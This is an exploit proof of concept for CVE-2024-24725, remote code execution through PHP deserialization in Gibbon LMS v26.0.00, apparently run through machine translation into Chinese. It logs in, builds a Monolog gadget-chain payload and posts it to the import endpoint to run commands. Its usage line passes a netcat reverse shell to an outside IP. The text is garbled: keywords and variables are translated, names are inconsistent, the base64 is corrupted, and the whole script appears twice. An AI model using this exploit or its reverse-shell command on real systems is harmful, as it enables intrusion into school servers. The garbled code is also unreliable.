#利用title:长臂猿LMS在V26.0.00版本上具有php避难所漏洞
#日期: 22.01.2024
#利用作者: Secondx.io研究团队(Ali Maharramli,Fikrat Guliev,伊斯兰Rzayev)
#供应商homepage: https://gibbonedu.org/
#软件link: https://github.com/gibbonedu/core
#版本: V26.0.00
#测试在: Ubuntu 22.0
#CVE : CVE-2024-24725
导入请求
导入
导入系统
导入基础64
导入Urllib.Parse
def登录(target_host,target_port,电子邮件,密码):
url=f'http://{target_host} : {target_port}/login.php?timeout=true'
标题={'content-type':'multipart/form-data;边界=----------------------------------- 17447595731268836341556039466'}
data=f'---------------------------------------- 17447595731268836341556039466 \ r \ ncontent-disposition: form-data; name=\'address\'\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'method\'\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'username\'\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'password\'\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'gibbonSchoolYearID\'\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'gibboni18nID\'\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n'
r=requests.post(url,headers=标题,data=data,ally_redirects=false)
打印(URL)
印刷(R.Headers)
session_cookie=re.split(r'\ s+',r.headers ['set-cookie'])
如果session_cookie [4]不是一个(r.headers ['location']):
打印('[x]登录成功!')
返回session_cookie [4]
Def Generate_Payload(命令):
#给定的base64编码字符串
###实际有效:
### A:2: {I:7%3BO3BO3:32:'MONOLOL \ HANDLER \ SYSLOGUDPHANDLER':1: {S:93 3360'%00*%00socket'%3BO3BO3BO3:29:'MONOLOL \ HANDLER \ BUFFERHANDLER'3:733333333333333333333333 60 {S:10:'%00*%00 Handler'%3BR:3%3BS3:133:'%00*%00 00 Buffersize'%3BI3 3360-1%3BS:9:'%00*%00 buffer'%3BA3:1: {i3:0%3BA3:2: {i33:0% 3BS:COMMAND_SIZE:'COMMAND'%3BS3:5:'Level'%3BN%3B}} S3:8:'%00* %00 Level'%30亿%3BS:14:'%00*%00 Initialized'%3BB3:1%3BS3:14:'%00*%00 BufferLimit'%3BI:-1%3BS3:13:'%00*%00 00 00 00 00%3BA33:23: {I3:0% 3BS:7:'Current'%3BI:1%3BS3:6:'System'%3B}}}}}} i:7%3BI3:7%3B}
base64_encoded_string='ytoyontpojclm0jpojmyoijnb25vbg9nxehhbmrszxjcu3lzbg9nvwrwsgfuzgfuzgxlcii6mtp7czo 5OIILMDAQJTAWC29JA2V0IIUZQK86MJK6IK1VBM9SB2DCSGFUZGFUZGXLCLXCDWZMZXJIYW5KBGVYIJO 3ontzojewoiilmdaqjtawagfuzgxlciilm0jyojmlm0jzojezoiilmdaqjtawynvmzmzmvmvyu2l6zsi lm0jpoi0xjtncczo5oiiilmdaqjtawynvmzmvyiiuzqme6mtp7atowjtncytncytoyontoyontpojalm0jzoknp tu1btkrfu0lartoiq09ntuforcilm0jzoju6imxldmvsiiuzqk4lm0j9fxm6odoijtawkiuwmgxl DMVSIIUZQK4LM0JZOJE0OIIILMDAQJTAWAW5PDGLHBGL6ZWQIJTNCYTNCYJOXJTNCCCZZOXNDOIJTAWKIUW MGJ1ZMZLCKXPBWL0IIUZQMK6LTELM0JZOJEZOIILMDAQJTAWCHJVY2VZC2VZC29YCYILM0JHOJI6E2K6 mcuzqnm6nzoiy3vycmvudcilm0jpojelm0jzojy6inn5c3rlbsilm0j9fx1pojclm0jpojclm0j9'
command_size=len(命令)
#DECODE BASE64
desded_bytes=base64.b64decode(base64_encoded_string)
desded_string=decoded_bytes.decode('utf-8')
#URL解码
有效载荷=urllib.parse.unquote(decoded_string)
#在解码的字符串中替换占位符
有效载荷=pareload.replace('command_size',str(command_size))
有效载荷=pareload.replace('命令',命令)
打印('[x]有效载荷生成!')
退回有效载荷
def rce(cookie,target_host,target_port,命令):
url=f'http://{target_host} : {target_port}/index.php?q=/modules/system/system%20admin/import_run.phptypy=externalAssessmentStep=4
标题={'content-type':'multipart/form-data;边界=---------------------------------- 104550429928543086952438317710','cookie': cookie}
有效载荷=generate_payload(命令)
data=f'----------------------------------- 104550429928543086952438317710 \ r \ ncontent-disposition: form-data; name='address'\ r \ n \ r \ n/模块/系统admin/import_run.php \ r \ n ----------------------------------------------------------------- 104550429928543086952438317710 \ r \ r \ ncontent-disposition: form-data; name='mode'\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='syncField'\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='syncColumn'\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='columnOrder'\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name='columnText'\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='fieldDelimiter'\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='stringEnclosure'\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='filename'\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='csvData'\r\n\r\n'External Assessment','Assessment Date','Student','Field Name Category','Field Name','Result'\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='ignoreErrors'\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='Failed'\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
r=requests.post(url,headers=标题,data=data,ally_redirects=false)
打印('[x]请求发送!')
start_index=r.text.find('H2Step 4-实时运行/H2')
end_index=r.text.find('div class',start_index)
结果=r.text [start_index+26:end_index] .strip()
如果结果!='':
打印('[x]执行结果: \ n'+结果)
其他:
print('[x]命令失败或没有输出任何内容。')
开放('pocresponse.html','wb')为f:
F.Write(R.Content)
如果name=='__ -Main __':
如果Len(sys.argv)!=6:
print('[x] usage: script.py target_host target_port/url电子邮件密码命令')
print('[x]示例: python gibbon_rce.py 192.168.1.1.100 80/gibbon [email protected] password1 \'./nc -e/bin/bin/bash 172.28.218.3 44444444444444444444444 \''')
sys.exit(1)
cookie=login(sys.argv [1],sys.argv [2],sys.argv [3],sys.argv [4])
RCE(cookie,sys.argv [1],sys.argv [2],sys.argv [5])
#日期: 22.01.2024
#利用作者: Secondx.io研究团队(Ali Maharramli,Fikrat Guliev,伊斯兰Rzayev)
#供应商homepage: https://gibbonedu.org/
#软件link: https://github.com/gibbonedu/core
#版本: V26.0.00
#测试在: Ubuntu 22.0
#CVE : CVE-2024-24725
导入请求
导入
导入系统
导入基础64
导入Urllib.Parse
def登录(target_host,target_port,电子邮件,密码):
url=f'http://{target_host} : {target_port}/login.php?timeout=true'
标题={'content-type':'multipart/form-data;边界=----------------------------------- 17447595731268836341556039466'}
data=f'---------------------------------------- 17447595731268836341556039466 \ r \ ncontent-disposition: form-data; name=\'address\'\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'method\'\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'username\'\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'password\'\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'gibbonSchoolYearID\'\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\'gibboni18nID\'\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n'
r=requests.post(url,headers=标题,data=data,ally_redirects=false)
打印(URL)
印刷(R.Headers)
session_cookie=re.split(r'\ s+',r.headers ['set-cookie'])
如果session_cookie [4]不是一个(r.headers ['location']):
打印('[x]登录成功!')
返回session_cookie [4]
Def Generate_Payload(命令):
#给定的base64编码字符串
###实际有效:
### A:2: {I:7%3BO3BO3:32:'MONOLOL \ HANDLER \ SYSLOGUDPHANDLER':1: {S:93 3360'%00*%00socket'%3BO3BO3BO3:29:'MONOLOL \ HANDLER \ BUFFERHANDLER'3:733333333333333333333333 60 {S:10:'%00*%00 Handler'%3BR:3%3BS3:133:'%00*%00 00 Buffersize'%3BI3 3360-1%3BS:9:'%00*%00 buffer'%3BA3:1: {i3:0%3BA3:2: {i33:0% 3BS:COMMAND_SIZE:'COMMAND'%3BS3:5:'Level'%3BN%3B}} S3:8:'%00* %00 Level'%30亿%3BS:14:'%00*%00 Initialized'%3BB3:1%3BS3:14:'%00*%00 BufferLimit'%3BI:-1%3BS3:13:'%00*%00 00 00 00 00%3BA33:23: {I3:0% 3BS:7:'Current'%3BI:1%3BS3:6:'System'%3B}}}}}} i:7%3BI3:7%3B}
base64_encoded_string='ytoyontpojclm0jpojmyoijnb25vbg9nxehhbmrszxjcu3lzbg9nvwrwsgfuzgfuzgxlcii6mtp7czo 5OIILMDAQJTAWC29JA2V0IIUZQK86MJK6IK1VBM9SB2DCSGFUZGFUZGXLCLXCDWZMZXJIYW5KBGVYIJO 3ontzojewoiilmdaqjtawagfuzgxlciilm0jyojmlm0jzojezoiilmdaqjtawynvmzmzmvmvyu2l6zsi lm0jpoi0xjtncczo5oiiilmdaqjtawynvmzmvyiiuzqme6mtp7atowjtncytncytoyontoyontpojalm0jzoknp tu1btkrfu0lartoiq09ntuforcilm0jzoju6imxldmvsiiuzqk4lm0j9fxm6odoijtawkiuwmgxl DMVSIIUZQK4LM0JZOJE0OIIILMDAQJTAWAW5PDGLHBGL6ZWQIJTNCYTNCYJOXJTNCCCZZOXNDOIJTAWKIUW MGJ1ZMZLCKXPBWL0IIUZQMK6LTELM0JZOJEZOIILMDAQJTAWCHJVY2VZC2VZC29YCYILM0JHOJI6E2K6 mcuzqnm6nzoiy3vycmvudcilm0jpojelm0jzojy6inn5c3rlbsilm0j9fx1pojclm0jpojclm0j9'
command_size=len(命令)
#DECODE BASE64
desded_bytes=base64.b64decode(base64_encoded_string)
desded_string=decoded_bytes.decode('utf-8')
#URL解码
有效载荷=urllib.parse.unquote(decoded_string)
#在解码的字符串中替换占位符
有效载荷=pareload.replace('command_size',str(command_size))
有效载荷=pareload.replace('命令',命令)
打印('[x]有效载荷生成!')
退回有效载荷
def rce(cookie,target_host,target_port,命令):
url=f'http://{target_host} : {target_port}/index.php?q=/modules/system/system%20admin/import_run.phptypy=externalAssessmentStep=4
标题={'content-type':'multipart/form-data;边界=---------------------------------- 104550429928543086952438317710','cookie': cookie}
有效载荷=generate_payload(命令)
data=f'----------------------------------- 104550429928543086952438317710 \ r \ ncontent-disposition: form-data; name='address'\ r \ n \ r \ n/模块/系统admin/import_run.php \ r \ n ----------------------------------------------------------------- 104550429928543086952438317710 \ r \ r \ ncontent-disposition: form-data; name='mode'\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='syncField'\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='syncColumn'\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='columnOrder'\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition:form-data; name='columnText'\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='fieldDelimiter'\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='stringEnclosure'\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='filename'\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='csvData'\r\n\r\n'External Assessment','Assessment Date','Student','Field Name Category','Field Name','Result'\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='ignoreErrors'\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name='Failed'\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'
r=requests.post(url,headers=标题,data=data,ally_redirects=false)
打印('[x]请求发送!')
start_index=r.text.find('H2Step 4-实时运行/H2')
end_index=r.text.find('div class',start_index)
结果=r.text [start_index+26:end_index] .strip()
如果结果!='':
打印('[x]执行结果: \ n'+结果)
其他:
print('[x]命令失败或没有输出任何内容。')
开放('pocresponse.html','wb')为f:
F.Write(R.Content)
如果name=='__ -Main __':
如果Len(sys.argv)!=6:
print('[x] usage: script.py target_host target_port/url电子邮件密码命令')
print('[x]示例: python gibbon_rce.py 192.168.1.1.100 80/gibbon [email protected] password1 \'./nc -e/bin/bin/bash 172.28.218.3 44444444444444444444444 \''')
sys.exit(1)
cookie=login(sys.argv [1],sys.argv [2],sys.argv [3],sys.argv [4])
RCE(cookie,sys.argv [1],sys.argv [2],sys.argv [5])